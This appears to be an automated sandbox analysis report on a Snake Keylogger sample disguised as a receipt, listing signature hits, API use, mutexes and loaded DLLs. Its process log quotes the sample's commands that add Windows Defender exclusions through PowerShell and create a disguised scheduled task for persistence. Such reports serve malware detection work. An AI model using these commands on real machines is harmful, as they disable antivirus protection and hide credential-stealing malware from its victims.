                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: e-dekont_html.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: HvgRSvNGGXnNtV.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, CSBqd76FVHPD4GisL5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, CSBqd76FVHPD4GisL5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, CSBqd76FVHPD4GisL5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, CSBqd76FVHPD4GisL5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/15@3/3
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMutant created: \Sessions\1\BaseNamedObjects\pgwhiUFLTcntfcELHBXRLvhVk
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:720:120:WilError_03
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE95B.tmpJump to behavior
                Source: e-dekont_html.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: e-dekont_html.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034F3000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: e-dekont_html.exeVirustotal: Detection: 52%
                Source: e-dekont_html.exeReversingLabs: Detection: 42%
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile read: C:\Users\user\Desktop\e-dekont_html.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
